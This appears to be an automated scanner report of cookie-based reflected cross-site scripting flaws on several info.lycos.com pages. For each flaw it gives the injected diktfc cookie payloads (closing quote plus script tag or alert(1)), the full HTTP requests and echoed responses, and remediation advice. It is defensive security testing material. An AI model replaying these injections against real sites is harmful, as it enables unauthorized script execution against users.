HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:07 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18589
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Abus ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/copyright.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A27849";alert(1)//a9b9c529a48.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d10bb"><script>alert(1)</script>e5827dbe638 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /copyright.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad10bb"><script>alert(1)</script>e5827dbe638; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:07 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Abus ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/copyright.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad10bb"><script>alert(1)</script>e5827dbe638.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5251b"><script>alert(1)</script>887c4447e55 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /jobs.php HTTP/1.1 Host: info.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5251b"><script>alert(1)</script>887c4447e55; displayMobile=0; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:27:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:49 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15488
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Curr ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/jobs.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5251b"><script>alert(1)</script>887c4447e55.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d910"%3balert(1)//820c5e59da9 was submitted in the diktfc cookie. This input was echoed as 7d910";alert(1)//820c5e59da9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jobs.php HTTP/1.1 Host: info.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7d910"%3balert(1)//820c5e59da9; displayMobile=0; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:27:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:50 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15458
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Curr ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/jobs.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7d910";alert(1)//820c5e59da9.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1655e"><script>alert(1)</script>bf11cff77f9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /legal/legal.asp HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1655e"><script>alert(1)</script>bf11cff77f9; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 89664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1655e"><script>alert(1)</script>bf11cff77f9.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb6"%3balert(1)//37ed0722e88 was submitted in the diktfc cookie. This input was echoed as 4eeb6";alert(1)//37ed0722e88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legal/legal.asp HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4eeb6"%3balert(1)//37ed0722e88; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:36 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 89634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4eeb6";alert(1)//37ed0722e88.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9447b"%3balert(1)//68c9f298253 was submitted in the diktfc cookie. This input was echoed as 9447b";alert(1)//68c9f298253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legal/sectoolbar.html HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9447b"%3balert(1)//68c9f298253; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:35 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 89634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9447b";alert(1)//68c9f298253.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99a57"><script>alert(1)</script>cc300b5c45e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /legal/sectoolbar.html HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A99a57"><script>alert(1)</script>cc300b5c45e; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 89664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A99a57"><script>alert(1)</script>cc300b5c45e.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 971b4"%3balert(1)//81f487453e8 was submitted in the diktfc cookie. This input was echoed as 971b4";alert(1)//81f487453e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /life.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A971b4"%3balert(1)//81f487453e8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:17 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16096
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Life ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/life.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A971b4";alert(1)//81f487453e8.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35baa"><script>alert(1)</script>9cc8ee2a812 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /life.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35baa"><script>alert(1)</script>9cc8ee2a812; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:17 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Life ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/life.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35baa"><script>alert(1)</script>9cc8ee2a812.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe78f"%3balert(1)//0ed3ac7046c was submitted in the diktfc cookie. This input was echoed as fe78f";alert(1)//0ed3ac7046c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /overview.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe78f"%3balert(1)//0ed3ac7046c; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16597
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Comp ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/overview.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe78f";alert(1)//0ed3ac7046c.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4900"><script>alert(1)</script>bf225484b1b was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /overview.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad4900"><script>alert(1)</script>bf225484b1b; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Comp ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/overview.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad4900"><script>alert(1)</script>bf225484b1b.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1672b"><script>alert(1)</script>2b55e5b0452 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1672b"><script>alert(1)</script>2b55e5b0452; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/privacy.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1672b"><script>alert(1)</script>2b55e5b0452.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ad88"%3balert(1)//e21d1919c06 was submitted in the diktfc cookie. This input was echoed as 8ad88";alert(1)//e21d1919c06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
